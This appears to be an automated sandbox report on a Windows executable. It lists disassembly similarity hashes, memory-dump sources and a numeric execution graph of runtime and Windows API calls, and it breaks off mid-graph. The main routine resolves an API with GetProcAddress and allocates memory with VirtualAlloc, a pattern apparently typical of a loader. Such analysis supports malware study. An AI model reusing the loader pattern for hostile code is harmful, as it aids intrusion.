                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                            • String ID:
                                            • API String ID: 2901542994-0
                                            • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                            • Instruction ID: 80b361bd606cbc40719eb4f5f96ffbd74a5bc2c22cd7752448e9b903c02e273b
                                            • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                            • Instruction Fuzzy Hash: 4401E932010209BBDF12AF95DD00EEA7BBAFF48754F158015FD1866124D77AE961DFA0
                                            APIs
                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004089F1
                                            • ___raise_securityfailure.LIBCMT ref: 00408AD8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2310707332.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000007.00000002.2310682718.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2310837369.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311018653.0000000000419000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311092801.000000000041A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004AC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311389200.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_400000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Similarity
                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                            • String ID: pkX
                                            • API String ID: 3761405300-1208605416
                                            • Opcode ID: 3bfa933cd9f80d2d980343ca243581c5a7bcc8ce31a4915db42b04b31cf8d940
                                            • Instruction ID: ce47133ac14827cdc7cd97d4094a7bdab6bdf8a17dabfcb0f1cc29d48106bbd0
                                            • Opcode Fuzzy Hash: 3bfa933cd9f80d2d980343ca243581c5a7bcc8ce31a4915db42b04b31cf8d940
                                            • Instruction Fuzzy Hash: 552103B59002059AEB08CF15F991A903FE4FB4E350F10847AE90A8BBA1E7B45881CF4E
                                            APIs
                                            • DecodePointer.KERNEL32(?,004048C6,00000000,00000000,00000000,00000000,00000000,0040885E,?,004071B4,00000003,00407D0C,00000000,00000000,00000000), ref: 00404898
                                            • __invoke_watson.LIBCMT ref: 004048B4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2310707332.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000007.00000002.2310682718.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2310837369.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311018653.0000000000419000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311092801.000000000041A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004AC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311389200.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_400000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Similarity
                                            • API ID: DecodePointer__invoke_watson
                                            • String ID: PNv
                                            • API String ID: 4034010525-4070351811
                                            • Opcode ID: 84d60ae60a04c498248f2f771724c9cfd818b9d55cd2f29cb77894693d8a0ab2
                                            • Instruction ID: fc2e5a9763a87430d8a6b07471e4a848680acba465897b27b0ab6fdbaa7b6f62
                                            • Opcode Fuzzy Hash: 84d60ae60a04c498248f2f771724c9cfd818b9d55cd2f29cb77894693d8a0ab2
                                            • Instruction Fuzzy Hash: 82E0ECB600014DBBDF053F61DC459AA3F69EF84250B448875FF1494071D73AC9B5EB98
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2310707332.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000007.00000002.2310682718.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2310837369.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311018653.0000000000419000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311092801.000000000041A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004AC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311389200.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_400000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Similarity
                                            • API ID: DecodePointer__set_abort_behavior
                                            • String ID: PNv
                                            • API String ID: 4109001881-4070351811
                                            • Opcode ID: 407aa33e05d94ef8e4fa2136f5ead6115be6c8d9de25bbe90a38a7a619bee60a
                                            • Instruction ID: 10eb291b106b89a8df65d8df1196d5e8742d775e364ab248a4328fa9fcce4b76
                                            • Opcode Fuzzy Hash: 407aa33e05d94ef8e4fa2136f5ead6115be6c8d9de25bbe90a38a7a619bee60a
                                            • Instruction Fuzzy Hash: F3C04CB135920169E65827A11D4AB691A449B40B16F24503BE515E80D0EEE98644942E

                                            Execution Graph

                                            Execution Coverage:4.4%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:1441
                                            Total number of Limit Nodes:19
                                            execution_graph 17015 459140 17016 45965a ___scrt_uninitialize_crt 70 API calls 17015->17016 17017 459148 17016->17017 17025 45f60c 17017->17025 17019 45914d 17020 45f6b7 14 API calls 17019->17020 17021 45915c DeleteCriticalSection 17020->17021 17021->17019 17022 459177 17021->17022 17023 45ee48 ___free_lconv_mon 14 API calls 17022->17023 17024 459182 17023->17024 17026 45f618 __FrameHandler3::FrameUnwindToState 17025->17026 17035 45a722 EnterCriticalSection 17026->17035 17028 45f68f 17036 45f6ae 17028->17036 17031 45f663 DeleteCriticalSection 17032 45ee48 ___free_lconv_mon 14 API calls 17031->17032 17034 45f623 17032->17034 17033 45931f 71 API calls 17033->17034 17034->17028 17034->17031 17034->17033 17035->17034 17039 45a76a LeaveCriticalSection 17036->17039 17038 45f69b 17038->17019 17039->17038 14921 464d54 14922 464d5d 14921->14922 14926 464d8f 14921->14926 14923 45ebbb 41 API calls 14922->14923 14924 464d80 14923->14924 14925 464b5f 52 API calls 14924->14925 14925->14926 15226 45f85d 15227 45f869 __FrameHandler3::FrameUnwindToState 15226->15227 15238 45a722 EnterCriticalSection 15227->15238 15229 45f870 15239 46555f 15229->15239 15237 45f88e 15263 45f8b4 15237->15263 15238->15229 15240 46556b __FrameHandler3::FrameUnwindToState 15239->15240 15241 465574 15240->15241 15242 465595 15240->15242 15244 45b188 __strnicoll 14 API calls 15241->15244 15266 45a722 EnterCriticalSection 15242->15266 15245 465579 15244->15245 15246 459007 __strnicoll 41 API calls 15245->15246 15248 45f87f 15246->15248 15247 4655cd 15274 4655f4 15247->15274 15248->15237 15252 45f6f7 GetStartupInfoW 15248->15252 15249 4655a1 15249->15247 15267 4654af 15249->15267 15253 45f714 15252->15253 15254 45f7a8 15252->15254 15253->15254 15255 46555f 42 API calls 15253->15255 15258 45f7ad 15254->15258 15256 45f73c 15255->15256 15256->15254 15257 45f76c GetFileType 15256->15257 15257->15256 15259 45f7b4 15258->15259 15260 45f7f7 GetStdHandle 15259->15260 15261 45f859 15259->15261 15262 45f80a GetFileType 15259->15262 15260->15259 15261->15237 15262->15259 15283 45a76a LeaveCriticalSection 15263->15283 15265 45f89f 15266->15249 15268 45edeb __dosmaperr 14 API calls 15267->15268 15271 4654c1 15268->15271 15269 4654ce 15270 45ee48 ___free_lconv_mon 14 API calls 15269->15270 15273 465523 15270->15273 15271->15269 15277 45f430 15271->15277 15273->15249 15282 45a76a LeaveCriticalSection 15274->15282 15276 4655fb 15276->15248 15278 45f123 std::_Locinfo::_Locinfo_dtor 5 API calls 15277->15278 15279 45f44c 15278->15279 15280 45f46a InitializeCriticalSectionAndSpinCount 15279->15280 15281 45f455 15279->15281 15280->15281 15281->15271 15282->15276 15283->15265 15322 451068 15327 453a7b 15322->15327 15328 453a8b 15327->15328 15330 45106d 15327->15330 15328->15330 15334 454306 InitializeCriticalSectionEx 15328->15334 15331 454a41 15330->15331 15335 454a14 15331->15335 15334->15328 15336 454a23 15335->15336 15337 454a2a 15335->15337 15341 45ddde 15336->15341 15344 45de5b 15337->15344 15340 451077 15342 45de5b 44 API calls 15341->15342 15343 45ddf0 15342->15343 15343->15340 15347 45dba7 15344->15347 15348 45dbb3 __FrameHandler3::FrameUnwindToState 15347->15348 15355 45a722 EnterCriticalSection 15348->15355 15350 45dbc1 15356 45dc02 15350->15356 15352 45dbce 15366 45dbf6 15352->15366 15355->15350 15357 45dc1d 15356->15357 15358 45dc90 std::_Locinfo::_Locinfo_dtor 15356->15358 15357->15358 15359 45dc70 15357->15359 15369 467a10 15357->15369 15358->15352 15359->15358 15361 467a10 44 API calls 15359->15361 15363 45dc86 15361->15363 15362 45dc66 15365 45ee48 ___free_lconv_mon 14 API calls 15362->15365 15364 45ee48 ___free_lconv_mon 14 API calls 15363->15364 15364->15358 15365->15359 15397 45a76a LeaveCriticalSection 15366->15397 15368 45dbdf 15368->15340 15370 467a1d 15369->15370 15371 467a38 15369->15371 15370->15371 15372 467a29 15370->15372 15373 467a47 15371->15373 15378 46923f 15371->15378 15374 45b188 __strnicoll 14 API calls 15372->15374 15385 463a16 15373->15385 15377 467a2e __fread_nolock 15374->15377 15377->15362 15379 46925f HeapSize 15378->15379 15380 46924a 15378->15380 15379->15373 15381 45b188 __strnicoll 14 API calls 15380->15381 15382 46924f 15381->15382 15383 459007 __strnicoll 41 API calls 15382->15383 15384 46925a 15383->15384 15384->15373 15386 463a23 15385->15386 15387 463a2e 15385->15387 15388 461e71 std::_Locinfo::_Locinfo_dtor 15 API calls 15386->15388 15389 463a36 15387->15389 15395 463a3f __dosmaperr 15387->15395 15394 463a2b 15388->15394 15392 45ee48 ___free_lconv_mon 14 API calls 15389->15392 15390 463a44 15393 45b188 __strnicoll 14 API calls 15390->15393 15391 463a69 HeapReAlloc 15391->15394 15391->15395 15392->15394 15393->15394 15394->15377 15395->15390 15395->15391 15396 45dac3 std::ios_base::_Init 2 API calls 15395->15396 15396->15395 15397->15368 15410 453e74 15415 453aa8 15410->15415 15412 453e82 __Deletegloballocale 15421 453b00 15412->15421 15414 453e9c 15416 453ab7 15415->15416 15417 453abe 15415->15417 15428 45a781 15416->15428 15419 453abc 15417->15419 15433 45431b EnterCriticalSection 15417->15433 15419->15412 15422 45a78f 15421->15422 15423 453b0a 15421->15423 15483 45a76a LeaveCriticalSection 15422->15483 15424 453b1d 15423->15424 15482 454329 LeaveCriticalSection 15423->15482 15424->15414 15427 45a796 15427->15414 15434 45f58b 15428->15434 15433->15419 15455 45ef3a 15434->15455 15443 45efa2 std::_Locinfo::_Locinfo_dtor 5 API calls 15444 45f5a4 15443->15444 15467 45efbc 15444->15467 15454 45f5bd 15454->15454 15456 45f123 std::_Locinfo::_Locinfo_dtor 5 API calls 15455->15456 15457 45ef50 15456->15457 15458 45ef54 15457->15458 15459 45f123 std::_Locinfo::_Locinfo_dtor 5 API calls 15458->15459 15460 45ef6a 15459->15460 15461 45ef6e 15460->15461 15462 45f123 std::_Locinfo::_Locinfo_dtor 5 API calls 15461->15462 15463 45ef84 15462->15463 15464 45ef88 15463->15464 15465 45f123 std::_Locinfo::_Locinfo_dtor 5 API calls 15464->15465 15466 45ef9e 15465->15466 15466->15443 15468 45f123 std::_Locinfo::_Locinfo_dtor 5 API calls 15467->15468 15469 45efd2 15468->15469 15470 45efd6 15469->15470 15471 45f123 std::_Locinfo::_Locinfo_dtor 5 API calls 15470->15471 15472 45efec 15471->15472 15473 45eff0 15472->15473 15474 45f123 std::_Locinfo::_Locinfo_dtor 5 API calls 15473->15474 15475 45f006 15474->15475 15476 45f024 15475->15476 15477 45f123 std::_Locinfo::_Locinfo_dtor 5 API calls 15476->15477 15478 45f03a 15477->15478 15479 45f00a 15478->15479 15480 45f123 std::_Locinfo::_Locinfo_dtor 5 API calls 15479->15480 15481 45f020 15480->15481 15481->15454 15482->15424 15483->15427 13628 454605 13629 454611 __FrameHandler3::FrameUnwindToState 13628->13629 13654 45487b 13629->13654 13631 454618 13632 454771 13631->13632 13642 454642 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 13631->13642 13704 454e26 IsProcessorFeaturePresent 13632->13704 13634 454778 13684 45c2da 13634->13684 13639 454661 13640 4546e2 13662 45bf18 13640->13662 13642->13639 13642->13640 13687 45c2b4 13642->13687 13644 4546e8 13666 46c217 13644->13666 13649 45470d 13650 454716 13649->13650 13695 45c28f 13649->13695 13698 4549ec 13650->13698 13655 454884 13654->13655 13711 454b4c IsProcessorFeaturePresent 13655->13711 13659 454895 13661 454899 13659->13661 13721 45789d 13659->13721 13661->13631 13663 45bf21 13662->13663 13664 45bf26 13662->13664 13781 45bc72 13663->13781 13664->13644 14442 45172b 13666->14442 13668 46c22f GetModuleHandleA 14450 4515b7 13668->14450 13670 46c249 _strlen 14454 45166a 13670->14454 13672 46c25f _strlen 13673 45166a std::ios_base::_Init 43 API calls 13672->13673 13674 46c275 GetProcAddress 13673->13674 13675 46c290 VirtualAlloc 13674->13675 14458 46c000 13675->14458 13677 46c2ad _Yarn 14464 46c0a0 13677->14464 13682 454791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13683 4546ff 13682->13683 13693 454f40 GetModuleHandleW 13683->13693 14688 45c0c2 13684->14688 13688 45c2ca __FrameHandler3::FrameUnwindToState std::_Locinfo::_Locinfo_dtor 13687->13688 13688->13640 13689 45eb00 __Getctype 41 API calls 13688->13689 13692 45e03b 13689->13692 13690 45b0a7 __FrameHandler3::FrameUnwindToState 41 API calls 13691 45e065 13690->13691 13692->13690 13694 454709 13693->13694 13694->13634 13694->13649 13696 45c0c2 std::locale::_Setgloballocale 23 API calls 13695->13696 13697 45c29a 13696->13697 13697->13650 13699 4549f8 13698->13699 13703 45471f 13699->13703 14765 45df9b 13699->14765 13701 454a06 13702 45789d ___scrt_uninitialize_crt 7 API calls 13701->13702 13702->13703 13703->13639 13705 454e3c __fread_nolock std::locale::_Setgloballocale 13704->13705 13706 454ee7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13705->13706 13707 454f2b std::locale::_Setgloballocale 13706->13707 13707->13634 13708 45c29e 13709 45c0c2 std::locale::_Setgloballocale 23 API calls 13708->13709 13710 454786 13709->13710 13712 454890 13711->13712 13713 45787e 13712->13713 13727 458957 13713->13727 13717 45788f 13718 45789a 13717->13718 13741 458993 13717->13741 13718->13659 13720 457887 13720->13659 13722 4578a6 13721->13722 13723 4578b0 13721->13723 13724 457a16 ___vcrt_uninitialize_ptd 6 API calls 13722->13724 13723->13661 13725 4578ab 13724->13725 13726 458993 ___vcrt_uninitialize_locks DeleteCriticalSection 13725->13726 13726->13723 13729 458960 13727->13729 13730 458989 13729->13730 13731 457883 13729->13731 13745 458b9c 13729->13745 13732 458993 ___vcrt_uninitialize_locks DeleteCriticalSection 13730->13732 13731->13720 13733 4579e3 13731->13733 13732->13731 13762 458aad 13733->13762 13736 4579f8 13736->13717 13739 457a13 13739->13717 13742 4589bd 13741->13742 13743 45899e 13741->13743 13742->13720 13744 4589a8 DeleteCriticalSection 13743->13744 13744->13742 13744->13744 13750 4589c2 13745->13750 13748 458bd4 InitializeCriticalSectionAndSpinCount 13749 458bbf 13748->13749 13749->13729 13751 4589e3 13750->13751 13752 4589df 13750->13752 13751->13752 13754 458a4b GetProcAddress 13751->13754 13755 458a3c 13751->13755 13757 458a62 LoadLibraryExW 13751->13757 13752->13748 13752->13749 13754->13752 13755->13754 13756 458a44 FreeLibrary 13755->13756 13756->13754 13758 458a79 GetLastError 13757->13758 13759 458aa9 13757->13759 13758->13759 13760 458a84 ___vcrt_InitializeCriticalSectionEx 13758->13760 13759->13751 13760->13759 13761 458a9a LoadLibraryExW 13760->13761 13761->13751 13763 4589c2 ___vcrt_InitializeCriticalSectionEx 5 API calls 13762->13763 13764 458ac7 13763->13764 13765 458ae0 TlsAlloc 13764->13765 13766 4579ed 13764->13766 13766->13736 13767 458b5e 13766->13767 13768 4589c2 ___vcrt_InitializeCriticalSectionEx 5 API calls 13767->13768 13769 458b78 13768->13769 13770 458b93 TlsSetValue 13769->13770 13771 457a06 13769->13771 13770->13771 13771->13739 13772 457a16 13771->13772 13773 457a20 13772->13773 13774 457a26 13772->13774 13776 458ae8 13773->13776 13774->13736 13777 4589c2 ___vcrt_InitializeCriticalSectionEx 5 API calls 13776->13777 13778 458b02 13777->13778 13779 458b1a TlsFree 13778->13779 13780 458b0e 13778->13780 13779->13780 13780->13774 13782 45bc91 13781->13782 13783 45bc7b 13781->13783 13782->13664 13783->13782 13787 45bc9e 13783->13787 13785 45bc88 13785->13782 13804 45be09 13785->13804 13788 45bca7 13787->13788 13789 45bcaa 13787->13789 13788->13785 13812 464d54 13789->13812 13794 45bcc7 13845 45bcf8 13794->13845 13795 45bcbb 13839 45ee48 13795->13839 13800 45ee48 ___free_lconv_mon 14 API calls 13801 45bceb 13800->13801 13802 45ee48 ___free_lconv_mon 14 API calls 13801->13802 13803 45bcf1 13802->13803 13803->13785 13805 45be7a 13804->13805 13808 45be18 13804->13808 13805->13782 13806 463ca4 WideCharToMultiByte std::_Locinfo::_Locinfo_dtor 13806->13808 13807 45edeb __dosmaperr 14 API calls 13807->13808 13808->13805 13808->13806 13808->13807 13810 45be7e 13808->13810 13811 45ee48 ___free_lconv_mon 14 API calls 13808->13811 13809 45ee48 ___free_lconv_mon 14 API calls 13809->13805 13810->13809 13811->13808 13813 464d5d 13812->13813 13817 45bcb0 13812->13817 13867 45ebbb 13813->13867 13818 465056 GetEnvironmentStringsW 13817->13818 13819 46506e 13818->13819 13832 45bcb5 13818->13832 13820 463ca4 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 13819->13820 13821 46508b 13820->13821 13822 465095 FreeEnvironmentStringsW 13821->13822 13823 4650a0 13821->13823 13822->13832 13824 461e71 std::_Locinfo::_Locinfo_dtor 15 API calls 13823->13824 13825 4650a7 13824->13825 13826 4650c0 13825->13826 13827 4650af 13825->13827 13829 463ca4 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 13826->13829 13828 45ee48 ___free_lconv_mon 14 API calls 13827->13828 13830 4650b4 FreeEnvironmentStringsW 13828->13830 13831 4650d0 13829->13831 13830->13832 13833 4650d7 13831->13833 13834 4650df 13831->13834 13832->13794 13832->13795 13835 45ee48 ___free_lconv_mon 14 API calls 13833->13835 13836 45ee48 ___free_lconv_mon 14 API calls 13834->13836 13837 4650dd FreeEnvironmentStringsW 13835->13837 13836->13837 13837->13832 13840 45bcc1 13839->13840 13841 45ee53 HeapFree 13839->13841 13840->13785 13841->13840 13842 45ee68 GetLastError 13841->13842 13843 45ee75 __dosmaperr 13842->13843 13844 45b188 __strnicoll 12 API calls 13843->13844 13844->13840 13846 45bd0d 13845->13846 13847 45edeb __dosmaperr 14 API calls 13846->13847 13848 45bd34 13847->13848 13849 45bd3c 13848->13849 13858 45bd46 13848->13858 13850 45ee48 ___free_lconv_mon 14 API calls 13849->13850 13866 45bcce 13850->13866 13851 45bda3 13852 45ee48 ___free_lconv_mon 14 API calls 13851->13852 13852->13866 13853 45edeb __dosmaperr 14 API calls 13853->13858 13854 45bdb2 14432 45bdda 13854->14432 13858->13851 13858->13853 13858->13854 13860 45bdcd 13858->13860 13862 45ee48 ___free_lconv_mon 14 API calls 13858->13862 14423 45e066 13858->14423 13859 45ee48 ___free_lconv_mon 14 API calls 13861 45bdbf 13859->13861 14438 459034 IsProcessorFeaturePresent 13860->14438 13864 45ee48 ___free_lconv_mon 14 API calls 13861->13864 13862->13858 13864->13866 13865 45bdd9 13866->13800 13868 45ebc6 13867->13868 13873 45ebcc 13867->13873 13918 45f334 13868->13918 13872 45ebd2 13877 45ebd7 13872->13877 13940 45b0a7 13872->13940 13873->13872 13923 45f373 13873->13923 13874 45ebea 13928 45edeb 13874->13928 13895 464b5f 13877->13895 13880 45ec13 13883 45f373 __dosmaperr 6 API calls 13880->13883 13881 45ebfe 13882 45f373 __dosmaperr 6 API calls 13881->13882 13884 45ec0a 13882->13884 13885 45ec1f 13883->13885 13888 45ee48 ___free_lconv_mon 14 API calls 13884->13888 13886 45ec23 13885->13886 13887 45ec32 13885->13887 13889 45f373 __dosmaperr 6 API calls 13886->13889 13935 45e92e 13887->13935 13892 45ec10 13888->13892 13889->13884 13892->13872 13893 45ee48 ___free_lconv_mon 14 API calls 13894 45ec44 13893->13894 13894->13877 14223 464cb4 13895->14223 13900 464ba2 13900->13817 13903 464bbb 13905 45ee48 ___free_lconv_mon 14 API calls 13903->13905 13904 464bc9 14250 464daf 13904->14250 13905->13900 13908 464c01 13909 45b188 __strnicoll 14 API calls 13908->13909 13910 464c06 13909->13910 13912 45ee48 ___free_lconv_mon 14 API calls 13910->13912 13911 464c48 13914 464c91 13911->13914 14261 4647d1 13911->14261 13912->13900 13913 464c1c 13913->13911 13916 45ee48 ___free_lconv_mon 14 API calls 13913->13916 13915 45ee48 ___free_lconv_mon 14 API calls 13914->13915 13915->13900 13916->13911 13951 45f123 13918->13951 13921 45f359 13921->13873 13922 45f36b TlsGetValue 13924 45f123 std::_Locinfo::_Locinfo_dtor 5 API calls 13923->13924 13925 45f38f 13924->13925 13926 45f3ad TlsSetValue 13925->13926 13927 45ebe6 13925->13927 13927->13872 13927->13874 13933 45edf8 __dosmaperr 13928->13933 13929 45ee38 13969 45b188 13929->13969 13930 45ee23 HeapAlloc 13931 45ebf6 13930->13931 13930->13933 13931->13880 13931->13881 13933->13929 13933->13930 13966 45dac3 13933->13966 14006 45e7c2 13935->14006 14108 462dfa 13940->14108 13943 45b0b7 13945 45b0c1 IsProcessorFeaturePresent 13943->13945 13950 45b0e0 13943->13950 13946 45b0cd 13945->13946 14138 458e0b 13946->14138 13947 45c29e std::locale::_Setgloballocale 23 API calls 13949 45b0ea 13947->13949 13950->13947 13952 45f151 13951->13952 13955 45f14d 13951->13955 13952->13955 13958 45f058 13952->13958 13955->13921 13955->13922 13956 45f16b GetProcAddress 13956->13955 13957 45f17b std::_Locinfo::_Locinfo_dtor 13956->13957 13957->13955 13963 45f069 ___vcrt_InitializeCriticalSectionEx 13958->13963 13959 45f087 LoadLibraryExW 13960 45f106 13959->13960 13961 45f0a2 GetLastError 13959->13961 13962 45f0ff 13960->13962 13964 45f118 FreeLibrary 13960->13964 13961->13963 13962->13955 13962->13956 13963->13959 13963->13962 13965 45f0d5 LoadLibraryExW 13963->13965 13964->13962 13965->13960 13965->13963 13972 45daf0 13966->13972 13983 45ec51 GetLastError 13969->13983 13971 45b18d 13971->13931 13973 45dafc __FrameHandler3::FrameUnwindToState 13972->13973 13978 45a722 EnterCriticalSection 13973->13978 13975 45db07 13979 45db43 13975->13979 13978->13975 13982 45a76a LeaveCriticalSection 13979->13982 13981 45dace 13981->13933 13982->13981 13984 45ec67 13983->13984 13985 45ec6d 13983->13985 13987 45f334 __dosmaperr 6 API calls 13984->13987 13986 45f373 __dosmaperr 6 API calls 13985->13986 14003 45ec71 SetLastError 13985->14003 13988 45ec89 13986->13988 13987->13985 13990 45edeb __dosmaperr 12 API calls 13988->13990 13988->14003 13991 45ec9e 13990->13991 13992 45ecb7 13991->13992 13993 45eca6 13991->13993 13995 45f373 __dosmaperr 6 API calls 13992->13995 13994 45f373 __dosmaperr 6 API calls 13993->13994 13996 45ecb4 13994->13996 13997 45ecc3 13995->13997 14000 45ee48 ___free_lconv_mon 12 API calls 13996->14000 13998 45ecc7 13997->13998 13999 45ecde 13997->13999 14002 45f373 __dosmaperr 6 API calls 13998->14002 14001 45e92e __dosmaperr 12 API calls 13999->14001 14000->14003 14004 45ece9 14001->14004 14002->13996 14003->13971 14005 45ee48 ___free_lconv_mon 12 API calls 14004->14005 14005->14003 14007 45e7ce __FrameHandler3::FrameUnwindToState 14006->14007 14020 45a722 EnterCriticalSection 14007->14020 14009 45e7d8 14021 45e808 14009->14021 14012 45e8d4 14013 45e8e0 __FrameHandler3::FrameUnwindToState 14012->14013 14025 45a722 EnterCriticalSection 14013->14025 14015 45e8ea 14026 45eab5 14015->14026 14017 45e902 14030 45e922 14017->14030 14020->14009 14024 45a76a LeaveCriticalSection 14021->14024 14023 45e7f6 14023->14012 14024->14023 14025->14015 14027 45eac4 __Getctype 14026->14027 14029 45eaeb __Getctype 14026->14029 14027->14029 14033 46649e 14027->14033 14029->14017 14107 45a76a LeaveCriticalSection 14030->14107 14032 45e910 14032->13893 14034 46651e 14033->14034 14037 4664b4 14033->14037 14035 46656c 14034->14035 14038 45ee48 ___free_lconv_mon 14 API calls 14034->14038 14101 46660f 14035->14101 14037->14034 14039 4664e7 14037->14039 14044 45ee48 ___free_lconv_mon 14 API calls 14037->14044 14040 466540 14038->14040 14041 466509 14039->14041 14050 45ee48 ___free_lconv_mon 14 API calls 14039->14050 14042 45ee48 ___free_lconv_mon 14 API calls 14040->14042 14043 45ee48 ___free_lconv_mon 14 API calls 14041->14043 14045 466553 14042->14045 14046 466513 14043->14046 14048 4664dc 14044->14048 14051 45ee48 ___free_lconv_mon 14 API calls 14045->14051 14052 45ee48 ___free_lconv_mon 14 API calls 14046->14052 14047 4665da 14053 45ee48 ___free_lconv_mon 14 API calls 14047->14053 14061 465754 14048->14061 14049 46657a 14049->14047 14060 45ee48 14 API calls ___free_lconv_mon 14049->14060 14055 4664fe 14050->14055 14056 466561 14051->14056 14052->14034 14059 4665e0 14053->14059 14089 465c08 14055->14089 14058 45ee48 ___free_lconv_mon 14 API calls 14056->14058 14058->14035 14059->14029 14060->14049 14062 465765 14061->14062 14088 46584e 14061->14088 14063 465776 14062->14063 14064 45ee48 ___free_lconv_mon 14 API calls 14062->14064 14065 465788 14063->14065 14066 45ee48 ___free_lconv_mon 14 API calls 14063->14066 14064->14063 14067 46579a 14065->14067 14069 45ee48 ___free_lconv_mon 14 API calls 14065->14069 14066->14065 14068 4657ac 14067->14068 14070 45ee48 ___free_lconv_mon 14 API calls 14067->14070 14071 4657be 14068->14071 14072 45ee48 ___free_lconv_mon 14 API calls 14068->14072 14069->14067 14070->14068 14073 4657d0 14071->14073 14074 45ee48 ___free_lconv_mon 14 API calls 14071->14074 14072->14071 14075 4657e2 14073->14075 14077 45ee48 ___free_lconv_mon 14 API calls 14073->14077 14074->14073 14076 4657f4 14075->14076 14078 45ee48 ___free_lconv_mon 14 API calls 14075->14078 14079 465806 14076->14079 14080 45ee48 ___free_lconv_mon 14 API calls 14076->14080 14077->14075 14078->14076 14081 465818 14079->14081 14082 45ee48 ___free_lconv_mon 14 API calls 14079->14082 14080->14079 14083 45ee48 ___free_lconv_mon 14 API calls 14081->14083 14084 46582a 14081->14084 14082->14081 14083->14084 14085 45ee48 ___free_lconv_mon 14 API calls 14084->14085 14086 46583c 14084->14086 14085->14086 14087 45ee48 ___free_lconv_mon 14 API calls 14086->14087 14086->14088 14087->14088 14088->14039 14090 465c15 14089->14090 14100 465c6d 14089->14100 14091 465c25 14090->14091 14092 45ee48 ___free_lconv_mon 14 API calls 14090->14092 14093 465c37 14091->14093 14094 45ee48 ___free_lconv_mon 14 API calls 14091->14094 14092->14091 14095 45ee48 ___free_lconv_mon 14 API calls 14093->14095 14096 465c49 14093->14096 14094->14093 14095->14096 14097 45ee48 ___free_lconv_mon 14 API calls 14096->14097 14099 465c5b 14096->14099 14097->14099 14098 45ee48 ___free_lconv_mon 14 API calls 14098->14100 14099->14098 14099->14100 14100->14041 14102 46661c 14101->14102 14103 46663b 14101->14103 14102->14103 14104 466123 __Getctype 14 API calls 14102->14104 14103->14049 14105 466635 14104->14105 14106 45ee48 ___free_lconv_mon 14 API calls 14105->14106 14106->14103 14107->14032 14144 462d2c 14108->14144 14111 462e3f 14112 462e4b __FrameHandler3::FrameUnwindToState 14111->14112 14113 45ec51 __dosmaperr 14 API calls 14112->14113 14116 462e78 std::locale::_Setgloballocale 14112->14116 14119 462e72 std::locale::_Setgloballocale 14112->14119 14113->14119 14114 462ebf 14115 45b188 __strnicoll 14 API calls 14114->14115 14117 462ec4 14115->14117 14118 462eeb 14116->14118 14158 45a722 EnterCriticalSection 14116->14158 14155 459007 14117->14155 14123 46301e 14118->14123 14124 462f2d 14118->14124 14134 462f5c 14118->14134 14119->14114 14119->14116 14137 462ea9 14119->14137 14125 463029 14123->14125 14190 45a76a LeaveCriticalSection 14123->14190 14124->14134 14159 45eb00 GetLastError 14124->14159 14128 